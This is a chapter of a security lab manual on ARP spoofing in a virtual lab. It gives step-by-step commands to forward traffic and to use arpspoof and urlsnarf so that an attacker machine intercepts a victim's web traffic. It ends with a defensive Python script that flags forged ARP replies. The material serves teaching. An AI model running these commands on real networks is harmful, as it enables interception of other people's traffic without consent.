Chapter 10 Arp Spoofing

10.1 Background

In this lab we will discuss ARP spoofing. ARP spoofing is an attack in which an attacker tricks a victim into believing that they are another machine, by pretending that their MAC address maps to an IP address that is not their own.

FIGURE 10.1: Shows the topology of the virtual lab you configured

VirtualBox emulates a virtual network with a virtual gateway. To determine the IP address of the default gateway, you need to determine the IP address of the Kali Linux virtual machine and its subnet mask.

10.2 Determining the Router Gateway

Step 1 Determine the IP address and subnet mask by typing the ifconfig command.

[Include picture with subnetmask and ipaddress highlighted]

Step 2 Calculate the default gateway by ANDing the subnet mask with your IP address and adding 1. The resulting number is your default gateway:

                   Octet 1     Octet 2     Octet 3     Octet 4
Kali IP            10          0           2           4
Kali IP (binary)   0000 1010   0000 0000   0000 0010   0000 0100
Subnet mask        255         255         255         0
Mask (binary)      1111 1111   1111 1111   1111 1111   0000 0000
(Mask & IP) + 1    10          0           2           1

Great, now that we have determined the IP address of our virtual gateway, we can trick the Metasploitable machine on our virtual network into thinking that we are the default gateway, so that all network traffic gets forwarded by the switch to our machine. We do this by sending packets that falsely tell the Metasploitable machine that the MAC address of the Kali machine is associated with the IP address of the default gateway. This means that all traffic that was intended for the default gateway will now get routed to the Kali Linux box.

[Include ARP spoofing picture below]

Step 3 Type: ip route | grep default to get the router IP

Step 4 On your attacker type: echo '1' > /proc/sys/net/ipv4/ip_forward

Step 5 On the attacker type: arpspoof -i eth0 -t VICTIMIP ROUTERIP

Step 6 On the attacker, in another terminal type: urlsnarf -i eth0

Step 7 On the victim, open Firefox and navigate. If you've done everything right, you will now see the traffic on the attacker.

Step 8 On the attacker: press Ctrl+C in the arpspoof terminal window to fix the ARP table and shut down the attack

10.3 Analyzing the Network Traffic Associated with the ARP Request

Close both VMs and open the packet capture in Wireshark. Look for the ARP messages between the attacker, victim, and router.
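
What to look for in those ARP messages can be checked mechanically. The Python sketch below is an added example, not part of the original lab: it parses raw ARP frames and reports any IP address claimed by more than one MAC, and any MAC claiming more than one IP. The addresses 10.0.2.4 and 10.0.2.1 come from the lab; the victim IP, all MAC addresses, and the function names are assumptions made for the example.

```python
import struct
from ipaddress import IPv4Address

# Ethernet header (14 bytes) + IPv4-over-Ethernet ARP body (28 bytes)
ARP_FMT = "!6s6sHHHBBH6s4s6s4s"

def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip) for an ARP frame, or None otherwise."""
    if len(frame) < 42:
        return None
    (_, _, etype, htype, ptype, hlen, plen,
     oper, sha, spa, _, _) = struct.unpack(ARP_FMT, frame[:42])
    if (etype, htype, ptype, hlen, plen) != (0x0806, 1, 0x0800, 6, 4):
        return None
    return oper, sha.hex(":"), str(IPv4Address(spa))

def find_arp_anomalies(frames):
    """Return (IPs claimed by several MACs, MACs claiming several IPs)."""
    ip_to_macs, mac_to_ips = {}, {}
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None or parsed[2] == "0.0.0.0":  # skip non-ARP and ARP probes
            continue
        _, mac, ip = parsed
        ip_to_macs.setdefault(ip, set()).add(mac)
        mac_to_ips.setdefault(mac, set()).add(ip)
    return ({ip: m for ip, m in ip_to_macs.items() if len(m) > 1},
            {mac: i for mac, i in mac_to_ips.items() if len(i) > 1})

def sample_frame(oper, src_mac, src_ip, dst_mac, dst_ip):
    """Build one constructed ARP frame in memory (test data only; nothing is sent)."""
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    return struct.pack(ARP_FMT, mac(dst_mac), mac(src_mac), 0x0806, 1, 0x0800, 6, 4,
                       oper, mac(src_mac), IPv4Address(src_ip).packed,
                       mac(dst_mac), IPv4Address(dst_ip).packed)

# Constructed capture: 10.0.2.4 (Kali) and 10.0.2.1 (gateway) are from the lab;
# the victim IP 10.0.2.5 and every MAC address are made up for this example.
GW, KALI, VICTIM = "02:00:00:00:00:01", "02:00:00:00:00:04", "02:00:00:00:00:05"
CAPTURE = [
    sample_frame(2, GW, "10.0.2.1", VICTIM, "10.0.2.5"),    # genuine gateway reply
    sample_frame(2, KALI, "10.0.2.4", VICTIM, "10.0.2.5"),  # Kali answering for its own IP
    sample_frame(2, KALI, "10.0.2.1", VICTIM, "10.0.2.5"),  # forged: gateway IP, Kali MAC
    b"\x00" * 60,                                           # non-ARP frame, ignored
]

if __name__ == "__main__":
    conflicts, multi = find_arp_anomalies(CAPTURE)
    print("IPs with several MACs:", conflicts, "\nMACs with several IPs:", multi)
```

An IP address bound to two MACs is the stronger signal; a MAC that answers for several IPs can also be a legitimate router or multi-homed host, so treat it as a hint to investigate.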